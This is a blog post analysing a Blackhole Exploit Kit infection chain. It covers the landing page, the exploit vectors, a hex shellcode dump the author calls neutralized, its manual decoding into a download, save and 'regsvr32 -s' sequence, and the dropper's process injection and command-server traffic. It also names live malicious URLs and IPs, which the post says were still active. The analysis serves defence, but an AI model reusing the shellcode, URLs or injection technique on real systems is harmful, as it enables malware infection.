Slight changes detected in shellcode & dropper works of Blackhole Exploit Kit (landing page: 203.91.113.6 / mothership: 146.185.220.34)
16 Sep 2012 Well, currently #MalwareMustDie is in the hunting mode, so I joined the event, this is actually a report of the first case in hand which becoming an important matter in investigation of BHEK.
I received report of infection, and after looking a squid log I found the source
which is 203.91.113.6 and is "suspected" serving blackhole.
Why I quoted that word is because I am about 95% sure of it.
Just arrived home from 6hrs driving trip, after setting freebsd for analysis mode,
setting up privoxy & tor, I am aiming at the IP I mentioned previously.
The reported url at squid log url doesn't seem to exist anymore,
looks like the parameter was changed which was:h00p://bode-sales.net/w.php?f=9e4b3&e=2
I tried to combine the latest blackhole possible parameters and finally managed to
download the below url (via tor only..)--21:26:28-- h00p://bode-sales.net/main.php?page=3c23940fb7350489
=> `main.php@page=3c23940fb7350489'
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Resolving bode-sales.net... 203.91.113.6
Connecting to bode-sales.net|203.91.113.6|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 68,856 40.80K/s
21:26:32 (40.74 KB/s) - `main.php' saved [68856]
GET /main.php?page=3c23940fb7350489 HTTP/1.0
User-Agent: MalwareMustDieDieDieee/666.666.666
Accept: */*
Host: bode-sales.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 15 Sep 2012 12:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14
....(blah)
The file itself is the obvious BHEK landing page obfuscated JS/Code
for the research purpose I neutralized it here:-->>[PASTEBIN]
And after deobfs'ed it found the Plugin Detection of blackhole -
which also for the research purpose I neutralized it here:-->>[PASTEBIN]
The first time I checked in Virus Total about this landing page was ZERO, now:MD5: 88ebe56bca027174ab28406ddbafa2e6
File size: 67.2 KB ( 68856 bytes )
File name: main.php
File type: HTML
Detection: 4 / 42
Analysis date: 2012-09-15 17:09:47 UTC ( 0 分 ago )
URL: ---------->>[VIRUS-TOTAL]
Malware Name:
McAfee : JS/Exploit-Blacole.gq
Symantec : Trojan.Malscript
McAfee-GW-Edition : JS/Exploit-Blacole.gq
Kaspersky : Trojan-Downloader.JS.Expack.adl
Like the previously reported in this blog-->[HERE] basically exploit vector
of the plugin detect is unchanged,
and in our case now we have 6(six) exploitations.(The details is exactly asp per reported beforehand)
1. Java Object CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA (Gam.jar)-->[VT:1/9]
2. PDF File AcroPDF.PDF
3. DOMDocs Msxml2.XMLHTTP
4. Java Exploit javaplugin.191_40
5. Java webStart exploit JavaWebStart.isInstalled
*) I thought this time is without the SWF Exploit infector
A friend advised me and then I realized there is a
6. SWF Exploit (field.swf)-->[VT:20/42]
However we have the slight changes in the shellcode.
I am a big fan of shellzer, a PyDbg base shellcode decoder, and
using it often to many of my projects.
We have a problem figuring this blog's shellcode using shellzer.
So I cracked it manually, if some of you have same problem
I think I am sharing this howto as reference:
The above infector exploit sets the has the mission
to execute the below shellcode:41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81
e9 56fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3
af 1c Ocad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
d6 d7 7e 2O cO b4 d6 d7 d7a6 66 26 c4 bO d6 a2
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7
58 4O 5c 5c 58 12 O7 O7 4a 47 4c 4d O5 5b 49 44
4d 5b O6 46 4d 5c O7 5f O6 58 4O 58 17 4e 15 1d
1e 4b 1f 49 Oe 4d 15 19 28 28
*) PS: the above↑shellcode is neutralized
FYI, shellzer hangs if you pasted this code. I am not going into
debugging details on WHY it hangs, let's focus to the
point and solve the code..
Let's dump all of the strings first, you'll get something like this:iiiiN
..u4._3
d.@0.@
f.^<
t3,..
u..4$..uQ..LQV.u<.t5x
.V.v
@..;
u.^.^$
K.F.
....h
.......XPj@h
...P.
PU...^
.hon..hurlmT
...a
.r..
...\$
AQj.j.SWj.
j...
?.u.G
/p\X...JGLM.「IDM「.FM\._.X@X.N...K.I.M..((((
We won't know what this is all about except the looks of obfuscated URL -
in the last line, so I scan it to get below signatures & info..msf.fnstenv_mov: D9EED97424F45B817313
msf.jmp_call_additive: EB0C5E56311EAD01C3
msf.noupper: EB195E8BFE83C7008BD7
msf.shikata_ga_nai: DAD729C9B15AD97424F4
msf.single_static_bit: EB655E31ED83E10183E301
msf.countdown: FFC15E304C0E07E2FA
msf.call4_dw: FFC05E81760E
CCCCCC.xor: 434343434343EB0F5B33C966B9
77efe4.xor: 304500454975F9EB00
CCCC_INC_EBX_Slide: 43434343
XXXX_pop_eax_start: 58585858
7_push_PSQRVWU: 505351525657559CE8
push_user32: 68333200006855736572
push_urlmon: 686F6E00006875726C6D
push_shell32: 686C333200687368656C
edi_seh_k32: 33FF64FF37648927FF07EBE8
peb_k32: 64A1300000008B400C8B701C
hasher.ror7: 3AD67408C1CB0703DA40
E9Eb.hasher.rol3xor: C1C20332104080380075F5
didier.hll.template: 8945F868FA8B340068884E0D00E8080000008945FC
By this I guessed the API method of urlmon.dll, and others
was used to the code.. but couldn't detect any kernel32.dll API yet..
Let's skip it for a while..Now is time to bruteforce(bf) the code,
you can use any tools available and try some bf logic! :-)
Shortly, I got these interesting strings and fixed them:h00p://bode-sales.net/w.php?f=56c7a&e=1
$regsvr32 -s $hwpbt$i.dll
*) which further $h lead to temp dir strings &
$i leads to null values so I put 0 in it.
The story is urlmon.dll is being called to download
malicious file from "h00p://bode-sales.net/w.php?f=56c7a&e=1"
save as %Temp%wpbt0.dll, execute, register it with "regsvr32 -s"
command in your PC. Looks like we have a slight changes in shellcode
API for the usage of calls from non kernel32.dll.
This is different point compares to previous BHEK shellcode,
So let's see what payload it is (using tor) and saved it as per malware
scheme wanted it.--2012-09-15 20:47:08-- h00p://bode-sales.net/w.php?f=56c7a
Resolving localhost (localhost)... 127.0.0.1, ::1
Connecting to localhost (localhost)|::1|:8118... connected.
Proxy request sent, awaiting response... 200 OK
Length: 143207 (140K) [application/x-msdownload]
Saving to: `wpbt0.dll'
100%[======>] 143,207 44.5K/s in 3.1s
2012-09-15 20:47:13 (44.5 KB/s) - `wpbt0.dll' saved [143207/143207]
It is a PE binary with the below analysis:Hexing first sector:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 60 1C 53 50 00 00 00 00 PE..L...`.SP....
0090 00 00 00 00 E0 00 0F 01 0B 01 01 32 00 EC 00 00 ...........2....
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00 .B..............
00B0 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 ......@.........
00C0 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 ................
↑Quick reversing it...too seek some clue..
[0x00000000:0x00400000]> d
0x00000000 (01) 4d DEC EBP
0x00000001 (01) 5a POP EDX
0x00000002 (01) 90 NOP
0x00000003 (02) 0003 ADD [EBX], AL
0x00000005 (02) 0000 ADD [EAX], AL
0x00000007 (03) 000400 ADD [EAX+EAX], AL
0x0000000a (02) 0000 ADD [EAX], AL
0x0000000c (01) ff DB 0xff
0x0000000d (02) ff00 INC DWORD [EAX]
0x0000000f (06) 00b8 00000000 ADD [EAX+0x0], BH
0x00000015 (02) 0000 ADD [EAX], AL
0x00000017 (03) 0040 00 ADD [EAX+0x0], AL
: :
ーーーーーtastes like a packer trace..ーーーー
0x00000034 (02) 0000 ADD [EAX], AL
0x00000036 (02) 0000 ADD [EAX], AL
0x00000038 (02) 0000 ADD [EAX], AL
0x0000003a (02) 0000 ADD [EAX], AL
0x0000003c (03) 8000 00 ADD BYTE [EAX], 0x0
0x0000003f (02) 000e ADD [ESI], CL
0x00000041 (01) 1f POP DS
0x00000042 (05) ba 0e00b409 MOV EDX, 0x9b4000e
0x00000047 (02) cd 21 INT 0x21
0x00000049 (05) b8 014ccd21 MOV EAX, 0x21cd4c01
0x0000004e (01) 54 PUSH ESP
0x0000004f (05) 68 69732070 PUSH 0x70207369
0x00000054 (02) 72 6f JB 0x000000c5 ; 1
: :
PE Summary
Entry Point: 0x1000 at section: .code
CRC Fail: Claimed: 0 Actual: 185076
Compile Time: 0x50531C60 [Fri Sep 14 12:00:32 2012 UTC] <== NEW!
Packer: PureBasic 4.x -> Neil Hodgson
Compiler: Microsoft Visual C++ 5/6
Sections:
.code 0x1000 0x2775 10240
.teXT 0x4000 0xc335 50176
.rdata 0x11000 0x1a0f 7168
.data 0x13000 0x1218 2560
.rsrc 0x15000 0x115c 4608
Auto reverse first block and ...got the loops :-P
[0x401000L] push 0x0
[0x401005L] push 0x413998
[0x40100aL] call 0x404070L
[0x40100fL] add esp 0xc
[0x401014L] push 0x0
:
loop
:
[0x401677L] call 0x4021b7L //a h*ll of a looper...anti-reverse trap, patch it!
[0x40167aL] fstp st0
[0x40167fL] fild [0x413a08]
[0x401681L] fmul [0x413040]
[0x401687L] sub esp 0x4
[0x40168dL] fstp [esp]
Calls:
Complete calls listed here:--->>[PASTEBIN]
With the calls summary as per below:
Get system env, opening /exec files(by original C code),
opening thread, using timer.bitmap object manipulation,
GUI operations, using winsock, creation of TLS, creation of semaphores
↑OK, looks strange enough, let's reverse it well, I used radare2.
You can use anything you like, if you reversed it correctly
you'll find the below malicious API commands inside of the
packed parts of the sample (tips, unpacked it first):CopyFileW
(lpExistingFileName: "%Temp%wpbt0.dll",
lpNewFileName: "%ApData%\KB00725031.exe",
bFailIfExists: 0x0)
CreateRemoteThread
(hProcess: 0x68,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0x12032f0,
lpParameter: 0x1200000,
dwCreationFlags: 0x0,
lpThreadId: 0x0)
So we have a self copy operations and foreign memory injection here.
Yes, let's use sandbox to quickly confirm it:Malicious Processes
1960 c:\test\sample.exe (wpbt0.dll)
328 c:\documents and settings\user\application data\kb00725031.exe
Yes it dropped malicious malware kb00725031.exe - and somehow I remembered
this filename a while ago. I searched & found it here --->>[LINK]
(It will be another story of long history for the detail of this drop)
Let's continue,
Virus Total detection shows this detection when I found the payload 1st time:AntiVir : TR/Buzus.HT.11
AhnLab-V3 : Trojan/Win32.Jorik
Sophos : Mal/EncPk-AFN
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Kaspersky : Trojan.Win32.Jorik.Foreign.aa
Microsoft : VirTool:Win32/CeeInject.gen!HT
Comodo : UnclassifiedMalware
Now is becoming:MD5: a70da3ce151ac0eb46e3a0d959cd0af3
File size: 139.9 KB ( 143207 bytes )
File name: wpbt0.dll
File type: Win32 EXE
Detection : 9 / 41
Analysis date: 2012-09-15 16:21:04 UTC ( 0 分 ago )
URL:-------->>>[CLICK/VIRUS-TOTAL]
Malware Name:
VIPRE : Trojan.Win32.Generic!BT (NEW)
AntiVir : TR/Buzus.HT.11 (NEW)
AhnLab-V3 : Trojan/Win32.Jorik
ESET-NOD32 : a variant of Win32/Injector.WNM (NEW)
Sophos : Mal/EncPk-AFN
Microsoft : VirTool:Win32/CeeInject.gen!HT
Symantec : Trojan.ADH.2 (NEW)
Emsisoft : Trojan.Win32.Jorik.Foreign.AMN!A2
Comodo : UnclassifiedMalware
Well it supposed to connect to internet, let's carefully run it a bit :-)
Well it works as per expected, & starting to communicate to mothership -
in 146.185.220.34! Below is my record in UDP traffic:Req:
00000000 00 02 01 00 00 01 00 00 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 .ru.....
Ans:
00000000 00 02 81 80 00 01 00 01 00 00 00 00 13 74 75 6e ........ .....tun
00000010 69 6e 67 6c 61 6d 62 6f 73 67 6c 61 6d 6f 75 72 inglambo sglamour
00000020 02 72 75 00 00 01 00 01 c0 0c 00 01 00 01 00 00 .ru..... ........
00000030 0e 0f 00 04 92 b9 dc 22 ......."
Yes, it asked fortuninglambosglamour.ru IN A // 146.185.220.34
I bet it does some more malicious stuffs as per refered analysis above.
By the way the network info of the mothership:inetnum: 146.185.220.0 - 146.185.220.255
netname: mdsru-net
descr: MDS LTD.
country: RU
org: ORG-Ml192-RIPE
admin-c: AV6782-RIPE
tech-c: VA2854-RIPE
status: ASSIGNED PA
mnt-by: mdsru-mnt
source: RIPE # Filtered
organisation: ORG-Ml192-RIPE
org-name: MDS ltd.
org-type: OTHER
abuse-mailbox: info@mdsnet.org
address: Sofia Kovalevsaja st. 22
address: 620242 Ekaterinburg
address: Russian Federation
mnt-ref: mdsru-mnt
admin-c: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered
person: Andrey Voronov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russian Federation
phone: +74957392422
nic-hdl: AV6782-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered
person: Vlad Abramov
address: 1st Magistralny blind alley
address: 24, BC "The Yard"
address: Moskow
abuse-mailbox: info@mdsnet.org
address: Russia
phone: +74957392422
nic-hdl: VA2854-RIPE
mnt-by: mdsru-mnt
source: RIPE # Filtered
While the landing page is in this network:inetnum: 203.91.112.0 - 203.91.119.255
netname: G-Mobile
descr: G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1,
descr: Ulaanbaatar 211213, Mongolia
country: MN
admin-c: TG154-AP
tech-c: TG154-AP
route: 203.91.113.0/24
descr: G-Mobile Subnet
origin: AS24559
mnt-by: MAINT-MN-WIRELESSCOM
changed: tulga@g-mobile.mn 20090205
source: APNIC
person: Tulga Gandavaa
nic-hdl: TG154-AP
e-mail: tulga@g-mobile.mn
address: G-Mobile Corporation,
address: Chingeltei district 1st khoroo, Baga toiruu - 3/9
address: Ulaanbaatar, Mongolia
phone: +976-98101111
fax-no: +976-11-311195
country: MN
changed: tulga@g-mobile.mn 20070111
mnt-by: MAINT-MN-G-MOBILE
↑There are four more domains hosted in the same IP, there will be variation -
of possibilities for spam links to this infector.
This cases malware family photograph:Conclusion:
The moral of this story is, the shellcode format of BHEK is starting to change.
the usual kernel32.dll API based calls is becoming undetected, yet it
downloaded the dropper binary containing the copy API now.
Is a slight modification but it successfully fools some
automation scheme. Further investigation made me realize the reason,
which are written in "Bypassing Export address table Address Filter(EAF)"
which can be viewed--->>[HERE]
And additionally a friend advised the crash PoC of it in here -->>[HERE]
Maybe shellzer must be patched for handling this new type of shellcode.
I must say, maybe I missed something, since most of reversing are done manually,
so please sorry about it and please advice me in the comment area.
I think some more other changes in BHEK distribution is on the run too.
Let's keep our eyes stick to it and see what happen.
BTW, the infected urls are all up and alive so please be careful with it.
Malware MUST Die!!
